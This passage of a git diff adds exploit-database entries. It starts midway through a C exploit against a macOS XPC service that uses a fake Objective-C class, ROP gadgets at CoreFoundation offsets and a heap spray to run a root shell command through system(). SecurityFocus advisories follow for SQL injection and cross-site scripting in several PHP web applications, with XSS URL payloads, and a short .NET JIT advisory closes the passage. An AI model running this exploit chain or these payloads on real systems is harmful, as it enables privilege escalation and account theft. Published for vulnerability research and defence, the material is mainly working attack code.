hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; + hs->fake_objc_class.cache_bucket_mask = 0; + + // nasty hack to find the correct selector address :) + uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release"); + uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector + uint64_t sel = msgrefs[1]; + printf("%p\n", sel); + hs->fake_cache_bucket.cached_sel = sel; + + uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation"); + // pivot: +/* +push rax +add eax, [rax] +add [rbx+0x41], bl +pop rsp +pop r14 +pop r15 +pop rbp +ret +*/ + hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here + + // jump over the NULL then so there's more space: + //pop, pop, pop, ret: //and keep stack correctly aligned + hs->first_gadget = CoreFoundation_base + 0x46ef7; + + hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226; + hs->system = dlsym(RTLD_DEFAULT, "system"); + + hs->rdi = &hs->command; + strcpy(hs->command, "touch /tmp/hello_root"); + + + size_t heap_spray_pages = 0x40000; + size_t heap_spray_bytes = heap_spray_pages * 0x1000; + char* heap_spray_copies = malloc(heap_spray_bytes); + for (int i = 0; i < heap_spray_pages; i++){ + memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000); + } + + xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes); + + xpc_dictionary_set_uint64(msg, "Type", 1); + + xpc_dictionary_set_uint64(msg, "Interval", 0); + + xpc_connection_t xc = xpc_connection_create(NULL, NULL); + xpc_dictionary_set_connection(msg, "Connection", xc); + + // this has the same xpc dictionary hash as "Attributes" + char* long_key = malloc(1024); + memset(long_key, 'A', 1023); + long_key[1023] = '\x00'; + + xpc_dictionary_set_string(msg, long_key, "something or other that's not important"); + + uint64_t uuid[] = {0, 0x120202000}; + xpc_dictionary_set_uuid(msg, "Attributes", (const unsigned char*)uuid); + + xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg); + + printf("send and received\n"); + + xpc_release(msg); + return 0; + for(;;){ + CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE); + } + return 0; +} diff --git a/platforms/php/webapps/35734.txt b/platforms/php/webapps/35734.txt new file mode 100755 index 000000000..20421a731 --- /dev/null +++ b/platforms/php/webapps/35734.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/47782/info + +ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ZAPms 1.22 is vulnerable; other versions may also be affected. + +The following example request is available: + +
+ + + +
\ No newline at end of file diff --git a/platforms/php/webapps/35736.txt b/platforms/php/webapps/35736.txt new file mode 100755 index 000000000..f21ce704a --- /dev/null +++ b/platforms/php/webapps/35736.txt @@ -0,0 +1,47 @@ +source: http://www.securityfocus.com/bid/47786/info + +poMMo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +
+ + + + + + + + +
+ + + +2. + +http://www.example.com/index.php?referer=1"> + + +3. + +
+'> +
+ + + +4. + +
+ + +
+ + + diff --git a/platforms/php/webapps/35737.txt b/platforms/php/webapps/35737.txt new file mode 100755 index 000000000..30e5b8878 --- /dev/null +++ b/platforms/php/webapps/35737.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/47790/info + + +Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Calendarix 0.8.20080808 is vulnerable; other versions may also be affected. + + +
+ + + +
+ +http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E + +
+ + +
+ + +http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E + +http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E diff --git a/platforms/php/webapps/35739.txt b/platforms/php/webapps/35739.txt new file mode 100755 index 000000000..9ee99c23a --- /dev/null +++ b/platforms/php/webapps/35739.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/47826/info + +Argyle Social is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +1. +
+"}'> +
+ + +2. +
+< font color="#0000FF">","url":"http://www.google.com","short&q uot;:null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id" ;:"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":& quot;hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a 2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pnam e":null}}]}'> +
+ \ No newline at end of file diff --git a/platforms/windows/remote/35740.txt b/platforms/windows/remote/35740.txt new file mode 100755 index 000000000..bac34963f --- /dev/null +++ b/platforms/windows/remote/35740.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/47834/info + +The Microsoft .NET Framework is prone to a remote code-execution vulnerability that affects the Just-In-Time (JIT) compiler optimization on x86 architectures. + +Successful exploits may allow an attacker to execute arbitrary code in the context of the browser; this may aid in further attacks. + +if ((value == null || value == new string[0]) == false) \ No newline at end of file